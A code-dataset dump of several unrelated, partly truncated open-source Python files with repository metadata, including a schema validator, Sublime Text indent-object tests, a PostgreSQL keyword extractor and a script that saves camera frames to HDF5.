] | 2 | 2016-03-23T14:29:41.000Z | 2017-02-20T17:11:30.000Z | openerp/exceptions.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" OpenERP core exceptions.
This module defines a few exception types. Those types are understood by the
RPC layer. Any other exception type bubbling until the RPC layer will be
treated as a 'Server error'.
"""
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 37.508772 | 78 | 0.658092 |
fbf6f8315c8b89ca91d3b286cb9fd7bfaffd9e47 | 83,653 | py | Python | MainUi.py | james646-hs/Fgo_teamup | f1e5c6f514818b68e9abb9eab3c6103fd000819a | [
"MIT"
] | 18 | 2020-05-30T01:41:24.000Z | 2021-03-04T08:07:35.000Z | MainUi.py | james646-hs/Fgo_teamup | f1e5c6f514818b68e9abb9eab3c6103fd000819a | [
"MIT"
] | 1 | 2020-08-13T02:19:42.000Z | 2020-08-13T02:19:42.000Z | MainUi.py | james646-hs/Fgo_teamup | f1e5c6f514818b68e9abb9eab3c6103fd000819a | [
"MIT"
] | 2 | 2020-06-13T18:23:07.000Z | 2020-08-13T02:08:54.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MainUi.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
| 64.746904 | 106 | 0.748927 |
fbf8cddf274b4edc3f9ca19f3358df84f5395fdb | 4,122 | py | Python | utils/argparse.py | toytag/self-supervised-learning-for-semantic-segmentation | b3326df6d1fa045fabb27fc30542313adee00d30 | [
"MIT"
] | null | null | null | utils/argparse.py | toytag/self-supervised-learning-for-semantic-segmentation | b3326df6d1fa045fabb27fc30542313adee00d30 | [
"MIT"
] | null | null | null | utils/argparse.py | toytag/self-supervised-learning-for-semantic-segmentation | b3326df6d1fa045fabb27fc30542313adee00d30 | [
"MIT"
] | null | null | null | import argparse
| 64.40625 | 90 | 0.566715 |
fbf9c31021598e1cfc750b4e1fb2c63076b4d3ce | 2,401 | py | Python | finicky/schema.py | yaaminu/yaval | 32f04ecfa092c978fc026f6b7f58d6cf2defd8c9 | [
"MIT"
] | 14 | 2021-02-12T19:04:21.000Z | 2021-03-12T18:18:09.000Z | finicky/schema.py | yaaminu/yaval | 32f04ecfa092c978fc026f6b7f58d6cf2defd8c9 | [
"MIT"
] | 5 | 2021-02-12T16:04:37.000Z | 2021-04-14T12:05:02.000Z | finicky/schema.py | yaaminu/yaval | 32f04ecfa092c978fc026f6b7f58d6cf2defd8c9 | [
"MIT"
] | null | null | null | from finicky.validators import ValidationException
def validate(schema, data, hook=None):
    """Validate *data* against *schema*; return ``(errors, validated_data)``.

    Every field in *schema* is checked even after a failure, so all
    errors are collected in one pass.

    :param schema: mapping of field name -> validator.  A validator takes
                   the raw value (``data.get(name)``) and returns the
                   cleaned value, or raises
                   ``finicky.validators.ValidationException`` on failure.
                   Validators may transform the value (strip whitespace,
                   round numbers, ...).
    :param data: the input mapping to validate; must not be None
    :param hook: optional callable invoked with the validated mapping once
                 all fields have passed -- useful when validity depends on
                 several fields at once.  It may modify and must return the
                 mapping, or raise ``ValidationException``; its errors are
                 reported under the ``"___hook"`` key.
    :return: tuple ``(errors, validated_data)``
    """
    errors, cleaned = {}, {}
    for field, validator in schema.items():
        try:
            cleaned[field] = validator(data.get(field))
        except ValidationException as exc:
            errors[field] = exc.errors
    # The hook runs only on fully valid input; it can veto or reshape it.
    if not errors and hook:
        try:
            cleaned = hook(cleaned)
        except ValidationException as exc:
            errors["___hook"] = exc.errors
    return errors, cleaned
__all__ = ("validate",)
| 49 | 118 | 0.678051 |
fbfb1bbd5566de1b6744d8dee7be28df74fd818c | 3,194 | py | Python | tests/unique_test.py | yohplala/vaex | ca7927a19d259576ca0403ee207a597aaef6adc2 | [
"MIT"
] | null | null | null | tests/unique_test.py | yohplala/vaex | ca7927a19d259576ca0403ee207a597aaef6adc2 | [
"MIT"
] | null | null | null | tests/unique_test.py | yohplala/vaex | ca7927a19d259576ca0403ee207a597aaef6adc2 | [
"MIT"
] | null | null | null | from common import small_buffer
import pytest
import numpy as np
import pyarrow as pa
import vaex
| 33.270833 | 102 | 0.584534 |
fbfb4b2b18ec51f6264b25bae8ef574c623943f4 | 810 | py | Python | utils/utilsFreq.py | geobook2015/magPy | af0f31fc931786ac6f8d69a5290366418035859d | [
"Apache-2.0"
] | 1 | 2021-05-19T18:29:15.000Z | 2021-05-19T18:29:15.000Z | utils/utilsFreq.py | geobook2015/magPy | af0f31fc931786ac6f8d69a5290366418035859d | [
"Apache-2.0"
] | null | null | null | utils/utilsFreq.py | geobook2015/magPy | af0f31fc931786ac6f8d69a5290366418035859d | [
"Apache-2.0"
] | 2 | 2021-06-03T01:59:02.000Z | 2021-07-03T07:47:10.000Z | # utility functions for frequency related stuff
import numpy as np
import numpy.fft as fft
import math
# use this function for all FFT calculations
# then if change FFT later (i.e. FFTW), just replace one function
| 27.931034 | 65 | 0.728395 |
fbfbfe77a095f3da5c436ccb64b9b59f084a3b2c | 2,329 | py | Python | tools/extract_keywords.py | bitdotioinc/pglast | da4c0b1c237aad98894179af9cd29e044d526ba8 | [
"PostgreSQL"
] | null | null | null | tools/extract_keywords.py | bitdotioinc/pglast | da4c0b1c237aad98894179af9cd29e044d526ba8 | [
"PostgreSQL"
] | null | null | null | tools/extract_keywords.py | bitdotioinc/pglast | da4c0b1c237aad98894179af9cd29e044d526ba8 | [
"PostgreSQL"
] | null | null | null | # -*- coding: utf-8 -*-
# :Project: pglast -- Extract keywords from PostgreSQL header
# :Created: dom 06 ago 2017 23:34:53 CEST
# :Author: Lele Gaifax <lele@metapensiero.it>
# :License: GNU General Public License version 3 or later
# :Copyright: 2017, 2018 Lele Gaifax
#
from collections import defaultdict
from os.path import basename
from pprint import pformat
from re import match
import subprocess
# Header template written at the top of each generated module.  The two %s
# placeholders are presumably filled with the source header's name and a
# revision/date stamp by code not visible in this excerpt -- TODO confirm.
HEADER = """\
# -*- coding: utf-8 -*-
# :Project: pglast -- DO NOT EDIT: automatically extracted from %s @ %s
# :Author: Lele Gaifax <lele@metapensiero.it>
# :License: GNU General Public License version 3 or later
# :Copyright: 2017 Lele Gaifax
#
"""


# Script entry point.  NOTE(review): `main` is not defined in this
# excerpt -- confirm the full file provides it.
if __name__ == '__main__':
    main()
| 30.246753 | 88 | 0.613568 |
fbfc768e9b9032e8d1b05f89ef3578bc75d58172 | 1,913 | py | Python | tests/vi/test_indent_text_object.py | trishume/VintageousPlus | 1dd62435138234979fe5bb413e1731119b017daf | [
"MIT"
] | 6 | 2017-04-01T05:30:08.000Z | 2017-04-05T14:17:40.000Z | tests/vi/test_indent_text_object.py | trishume/VintageousPlus | 1dd62435138234979fe5bb413e1731119b017daf | [
"MIT"
] | 1 | 2017-04-04T06:47:13.000Z | 2017-04-04T14:26:32.000Z | tests/vi/test_indent_text_object.py | trishume/VintageousPlus | 1dd62435138234979fe5bb413e1731119b017daf | [
"MIT"
] | null | null | null | from collections import namedtuple
from sublime import Region as R
from VintageousPlus.tests import set_text
from VintageousPlus.tests import add_sel
from VintageousPlus.tests import ViewTest
from VintageousPlus.vi.text_objects import find_indent_text_object
# One parametrised case for the indent text-object tests: `content` is the
# buffer text with the cursor marked by "|" (see the note below), `start`
# is the initial selection, `expected` / `expected_inclusive` are the
# regions find_indent_text_object is expected to produce (apparently the
# non-inclusive vs. inclusive variants -- TODO confirm against its
# signature), and `msg` labels the case.
test = namedtuple('simple_test', 'content start expected expected_inclusive msg')

# cursor is at "|"
TESTS_INDENT = (
test(start=R(37, 37), expected=R(29, 62), expected_inclusive=R(29, 62), msg='should find indent', content='''
# a comment
def a_ruby_block
some_c|all
another_one
yerp
end'''.lstrip()),
test(start=R(37, 37), expected=R(29, 41), expected_inclusive=R(29, 80), msg='should find indent when there\'s a blank line', content='''
# a comment
def a_ruby_block
some_c|all
another_one_with(blank_line)
yerp
end'''.lstrip()),
test(start=R(42, 42), expected=R(34, 57), expected_inclusive=R(34, 58), msg='should work with pyhton-ey functions', content='''
# a python thing
def a_python_fn:
some_c|all()
what()
a_python_fn'''.lstrip()),
test(start=R(57, 57), expected=R(57, 57), expected_inclusive=R(57, 57), msg='should ignore when triggered on a whitespace-only line', content='''
# a python thing
def a_python_fn:
some_call()
what()
a_python_fn'''.lstrip()),
)
| 28.552239 | 149 | 0.681652 |
fbfd008303bf64141666afab184cb7b1413f62e6 | 1,417 | py | Python | example_write_camera_frames_to_hdf5.py | mihsamusev/pytrl_demo | 411a74cb5f3601f03438f608b4cf8e451a88345e | [
"MIT"
] | null | null | null | example_write_camera_frames_to_hdf5.py | mihsamusev/pytrl_demo | 411a74cb5f3601f03438f608b4cf8e451a88345e | [
"MIT"
] | null | null | null | example_write_camera_frames_to_hdf5.py | mihsamusev/pytrl_demo | 411a74cb5f3601f03438f608b4cf8e451a88345e | [
"MIT"
] | null | null | null | import cv2
from imutils.paths import list_images
import imutils
import re
import datetime
from datasets.hdf5datasetwriter import HDF5DatasetWriter
import progressbar
def get_timestamp(impath):
"assuming that the timestamp is a part of the image name"
date_str = impath.split(".")[0]
date_str = re.split(r"image data \d+ ", date_str)[1]
date = datetime.datetime.strptime(date_str, '%Y-%b-%d %H %M %S %f')
return date
# Load the data, sort by frame number
basePath = "D:/create lidar trafik data/newer data/ImageData/"
impaths = list(list_images(basePath))
impaths = sorted(impaths, key=get_frame_number)
print("[INFO] building HDF5 dataset...")
outputPath = basePath + "frames.hdf5"
writer = HDF5DatasetWriter((len(impaths), 360, 640, 3), outputPath)
# initialize the progress bar
widgets = ["Building Dataset: ", progressbar.Percentage(), " ",
progressbar.Bar(), " ", progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=len(impaths),
widgets=widgets).start()
for i, impath in enumerate(impaths):
date = get_timestamp(impath)
ts = (date - datetime.datetime(1970, 1, 1)) / datetime.timedelta(seconds=1)
image = cv2.imread(impath)
image = imutils.resize(image, width=640)
writer.add([image], [ts])
pbar.update(i)
# close the HDF5 writer
pbar.finish()
writer.close() | 31.488889 | 79 | 0.715596 |